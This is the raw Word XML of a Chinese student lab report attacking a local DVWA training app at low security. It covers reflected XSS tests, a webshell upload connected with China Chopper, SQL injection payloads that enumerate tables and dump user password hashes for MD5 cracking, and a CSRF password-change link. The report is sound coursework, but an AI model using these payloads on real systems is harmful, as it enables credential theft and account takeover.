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1941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 w:rsidRPr="004652D3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22A9DAC3" wp14:editId="693A364A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905B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14:paraId="2DAAC050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网络安全理论与技术实验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA08958" w14:textId="77777777" w:rsidR="00665AF2" w:rsidRPr="004652D3" w:rsidRDefault="00665AF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14:paraId="4BC1A4FF" w14:textId="77777777" w:rsidR="00B82A32" w:rsidRPr="004652D3" w:rsidRDefault="00B82A32" w:rsidP="00B82A32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 w:rsidRPr="004652D3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>实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验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报</w:t>
      </w:r>
      <w:r w:rsidR="00A93F97" w:rsidRPr="004652D3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004652D3"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3"/>
        <w:tblW w:w="9117" w:type="dxa"/>
        <w:tblInd w:w="10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2271"/>
        <w:gridCol w:w="5250"/>
        <w:gridCol w:w="1596"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="32CE2C80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3B509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A4F169" w14:textId="77777777" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00CA6972" w:rsidP="00CF0DEF">
            <w:pPr>
              <w:spacing w:line="320" w:lineRule="exact"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004652D3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>网络空间安全学院</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="28189446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DFECC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专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47498D9" w14:textId="66979B0D" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00742A2D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网络工程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="2A988679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D1A4B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班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E6996B" w14:textId="472EF2EB" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00742A2D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18272412</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="05697A1B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B995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E5653C" w14:textId="3B7078A8" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00742A2D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18041618</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="26807773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DFFFA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D1ED12" w14:textId="1E65DBD6" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00742A2D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廖越强</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="0D1B3234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33B30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4B2740F" w14:textId="13DE27A8" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00377D63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高梦州</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="7376E009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1A4B1" w14:textId="77777777" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00CA6972" w:rsidP="00F00859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F81629" w14:textId="4F6983BE" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00742A2D" w:rsidP="00741277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 w:hint="eastAsia"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>2020.11.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="3CBDED7C" w14:textId="77777777" w:rsidTr="00244034">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="1596" w:type="dxa"/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D9B80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成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 xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="004652D3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:bCs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C35C70" w14:textId="77777777" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00CA6972" w:rsidP="00CF0DEF">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA6972" w:rsidRPr="004652D3" w14:paraId="5A343616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7BBF" w14:textId="714C66B8" w:rsidR="00CA6972" w:rsidRPr="004652D3" w:rsidRDefault="00CA6972" w:rsidP="00F00859">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004652D3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>实验一</w:t>
            </w:r>
            <w:r w:rsidRPr="004652D3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="003B0751">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidR="003B0751">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>漏洞测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D20E9B" w:rsidRPr="004652D3" w14:paraId="6D742EA1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11F2" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRPr="004652D3" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B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实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10822FE5" w14:textId="47C3571E" w:rsidR="00D20E9B" w:rsidRPr="00CB0B55" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB04F3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了解学习</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB04F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="202020"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>利用php搭建DVWA漏洞测试环境，并实现low难度，课上讲授的全部攻击（SQL、XSS、文件上传、CSRF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D20E9B" w:rsidRPr="004652D3" w14:paraId="3D3CEC2F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528" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRPr="00B966AB" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B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实验原理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325DE30E" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRPr="0096209C" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360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96209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XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DC4E0D" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRPr="0096209C" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360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2．</w:t>
            </w:r>
            <w:r w:rsidRPr="0096209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文件上传漏洞是指用户上传了一个可执行脚本文件，并通过此文件获得了执行服器端命令的能力</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAB2AE1" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRPr="0096209C" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360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96209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SQL 注入是一种将 SQL 代码插入或添加到应用（用户）的输入参数中，之后再讲这些参数传递给后台的 SQL 服务器加以解析并执行的攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D77EFF2" w14:textId="2D98D1A1" w:rsidR="00D20E9B" w:rsidRPr="0080333D" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:eastAsia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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0096209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CSRF，全名 Cross Site Request Forgery，跨站请求伪造。很容易将它与 XSS 混淆，对于 CSRF，其两个关键点是跨站点的请求与请求的伪造，由于目标站无 token 或 referer 防御，导致用户的敏感操作的每一个参数都可以被攻击者获知，攻击者即可以伪造一个完全一样的请求以用户的身份达到恶意目的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D20E9B" w:rsidRPr="004652D3" w14:paraId="3364A263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95AC" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B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t>实验环境</w:t>
            </w:r>
            <w:r w:rsidRPr="004652D3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="004652D3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实验拓扑图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5886CA1B" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="203F31C2" w14:textId="512C5DA6" w:rsidR="00D20E9B" w:rsidRPr="004652D3" w:rsidRDefault="001831FA" w:rsidP="00D20E9B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2E11811F" wp14:editId="0F0B61B9">
                  <wp:extent cx="4572000" cy="24214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E9B" w:rsidRPr="004652D3" w14:paraId="7F4674CD" w14:textId="77777777" w:rsidTr="00244034">
        <w:tblPrEx>
          <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
        </w:tblPrEx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91AC" w14:textId="77777777" w:rsidR="00D20E9B" w:rsidRPr="0080333D" w:rsidRDefault="00D20E9B" w:rsidP="00D20E9B">
            <w:pPr>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto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 w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>四、</w:t>
            </w:r>
            <w:r w:rsidRPr="0080333D">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>主要操作步骤及实验结果记录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E02302E" w14:textId="77777777" w:rsidR="001831FA" w:rsidRDefault="001831FA" w:rsidP="00251AB4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首先把安全等级调低（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>low</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F38C19C" w14:textId="77F5E268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99681E5" wp14:editId="6E01EE67">
                  <wp:extent cx="5274310" cy="303022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3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FB9C34" w14:textId="31DEBFAC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之后开始测试。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE56E8D" w14:textId="77777777" w:rsidR="001831FA" w:rsidRDefault="001831FA" w:rsidP="00251AB4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XSS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Refle</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>cted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C4D8A7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输入</w:t>
            </w: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h1&gt;a&lt;/h1&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，得到结果，说明标签没有被过滤，接下来试试</w:t>
            </w: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script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="293D619F" w14:textId="74D279DF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D0611A0" wp14:editId="1CDF157F">
                  <wp:extent cx="4983480" cy="1328968"/>
                  <wp:effectExtent l="0" t="0" r="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868" cy="1356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ABB1E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输入</w:t>
            </w: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alert&gt;alert(‘lyq’)&lt;/alert&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499A4CA8" w14:textId="62BFC294" w:rsidR="001831FA" w:rsidRP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9886B2" wp14:editId="03746031">
                  <wp:extent cx="4277675" cy="145542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476" cy="149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818B4" w14:textId="77777777" w:rsidR="001831FA" w:rsidRDefault="001831FA" w:rsidP="00251AB4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文件上传</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40153FD3" w14:textId="3D3DDA58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8A01516" wp14:editId="4055CC3A">
                  <wp:extent cx="2819644" cy="122692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EE354B" w14:textId="32F06BDE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0C97AA8" wp14:editId="3C7342EB">
                  <wp:extent cx="5274310" cy="156718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18C80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访问该文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C66F8C4" w14:textId="035F7163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2C044B4" wp14:editId="651895D7">
                  <wp:extent cx="4877223" cy="1402202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DD911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编写一句话木马</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8D8B1F" w14:textId="61010B2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03C6F7" wp14:editId="3DF4D456">
                  <wp:extent cx="3223539" cy="99830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39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5158F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上传后，用中国菜刀连接，如图，成功连接</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0015BBBA" w14:textId="36178733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23E2DD9A" wp14:editId="515C2FAA">
                  <wp:extent cx="4313294" cy="1783235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17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A8A0B" w14:textId="767BDDBD" w:rsidR="001831FA" w:rsidRP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08F6804B" wp14:editId="73A46E9F">
                  <wp:extent cx="5274310" cy="230568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DA9FC" w14:textId="2E5A2777" w:rsidR="001831FA" w:rsidRDefault="001831FA" w:rsidP="00251AB4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SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF789CE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分别使用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和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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>判断是存在注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A8BAF9" w14:textId="5E674913" w:rsidR="001831FA" w:rsidRP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3B6B48D3" wp14:editId="5BB4CF0F">
                  <wp:extent cx="4000500" cy="1422690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585" cy="143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59A19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报错了，说明存在注入点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="105D3C97" w14:textId="5F5E1D56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8067F30" wp14:editId="2C4A3EC3">
                  <wp:extent cx="5274310" cy="93916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3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2B4C9" w14:textId="77777777" w:rsidR="001831FA" w:rsidRPr="00163C5E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/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00163C5E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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>输入1' or 1=1 order by 2#，查询成功：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14EE3620" w14:textId="77777777" w:rsidR="001831FA" w:rsidRPr="00163C5E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63C5E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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>输入1' or 1=1 order by 3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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00163C5E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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>，报错了，说明有只有两个字段，即这里的First name、Surname。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="119F23F6" w14:textId="777777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输入</w:t>
            </w:r>
            <w:r w:rsidRPr="004805CE">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>1' union select 1,database()#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得到数据库名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38985990" w14:textId="543574FD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F6CBCE6" wp14:editId="3997B898">
                  <wp:extent cx="4640982" cy="2118544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982" cy="211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A8221" w14:textId="77777777" w:rsidR="001831FA" w:rsidRPr="00920A4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 w:rsidRPr="00920A4A">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>数据库版本太低时，可能会出现</w:t>
            </w:r>
            <w:r w:rsidRPr="00920A4A">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Illegal mix of collations for operation 'UNION'</w:t>
            </w:r>
            <w:r w:rsidRPr="00920A4A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的意外错误</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9490E2" w14:textId="77777777" w:rsidR="00251AB4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猜表名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622F0719" w14:textId="4DD6269F" w:rsidR="001831FA" w:rsidRPr="00251AB4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251AB4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D5F517" w14:textId="339B3A77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36354995" wp14:editId="3554B8E3">
                  <wp:extent cx="5274310" cy="1478915"/>
                  <wp:effectExtent l="0" t="0" r="2540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A920A" w14:textId="70910444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猜列名（字段名）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D85A86E" w14:textId="77777777" w:rsidR="00251AB4" w:rsidRPr="00070575" w:rsidRDefault="00251AB4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070575">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065D8A0C" w14:textId="77777777" w:rsidR="00251AB4" w:rsidRPr="00251AB4" w:rsidRDefault="00251AB4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</w:p>
          <w:p w14:paraId="651EA951" w14:textId="67672E80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0320B5B" wp14:editId="6AEA6112">
                  <wp:extent cx="5274310" cy="143129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FD15E" w14:textId="04E464EB" w:rsidR="001831FA" w:rsidRDefault="001831FA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下载数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49004D4F" w14:textId="019344DB" w:rsidR="00251AB4" w:rsidRPr="00251AB4" w:rsidRDefault="00251AB4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 w:hint="eastAsia"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00845185">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="333333"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54FE6907" w14:textId="79CA686A" w:rsidR="00251AB4" w:rsidRDefault="00251AB4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97133A7" wp14:editId="36D78B19">
                  <wp:extent cx="5274310" cy="2623185"/>
                  <wp:effectExtent l="0" t="0" r="2540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2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A799A" w14:textId="77777777" w:rsidR="00251AB4" w:rsidRDefault="00251AB4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最后再将</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>md5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>值破译即可，例如第二个</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>md5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6514AB62" w14:textId="404EA2D2" w:rsidR="00251AB4" w:rsidRDefault="00251AB4" w:rsidP="001831FA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1C34007F" wp14:editId="1203BB3E">
                  <wp:extent cx="5274310" cy="2215515"/>
                  <wp:effectExtent l="0" t="0" r="254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929CF" w14:textId="6C57C489" w:rsidR="00251AB4" w:rsidRPr="00251AB4" w:rsidRDefault="00251AB4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 w:rsidRPr="00845185">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>这样就得到了</w:t>
            </w:r>
            <w:r w:rsidRPr="00845185">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidRPr="00845185">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表中所有用户的</w:t>
            </w:r>
            <w:r w:rsidRPr="00845185">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>first_name,last_name,password</w:t>
            </w:r>
            <w:r w:rsidRPr="00845185">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的数据。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B0D516" w14:textId="77777777" w:rsidR="00251AB4" w:rsidRDefault="00251AB4" w:rsidP="00251AB4">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine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CSRF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="121387DB" w14:textId="5E6745C6" w:rsidR="001831FA" w:rsidRDefault="00251AB4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构造</w:t>
            </w:r>
            <w:r w:rsidR="00A7460E">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如下</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>链接</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70783C27" w14:textId="3C1A3E7E" w:rsidR="00251AB4" w:rsidRPr="00591D8B" w:rsidRDefault="00251AB4" w:rsidP="00591D8B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asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00591D8B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=password1&amp;password_conf=password1&amp;Change=Change#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098D9812" w14:textId="0702D13A" w:rsidR="001831FA" w:rsidRDefault="00A7460E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目标用户点击后则会将自己的密码修改为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>password1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12214DF4" w14:textId="797CB653" w:rsidR="00A7460E" w:rsidRDefault="00743426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5483C3C9" wp14:editId="5DFAD40E">
                  <wp:extent cx="5274310" cy="234315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6B81D8" w14:textId="31278A58" w:rsidR="00743426" w:rsidRDefault="00743426" w:rsidP="00251AB4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测试密码有效性，可见密码已经成功修改</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="153A7926" w14:textId="6C0A4011" w:rsidR="001831FA" w:rsidRPr="00CB5672" w:rsidRDefault="00743426" w:rsidP="00CB5672">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B869513" wp14:editId="79D056F8">
                  <wp:extent cx="3977640" cy="3079247"/>
                  <wp:effectExtent l="0" t="0" r="3810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639" cy="308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E9B" w:rsidRPr="004652D3" w14:paraId="4C49A234" w14:textId="77777777" w:rsidTr="00E81F41">
        <w:tblPrEx>
          <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="4427"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
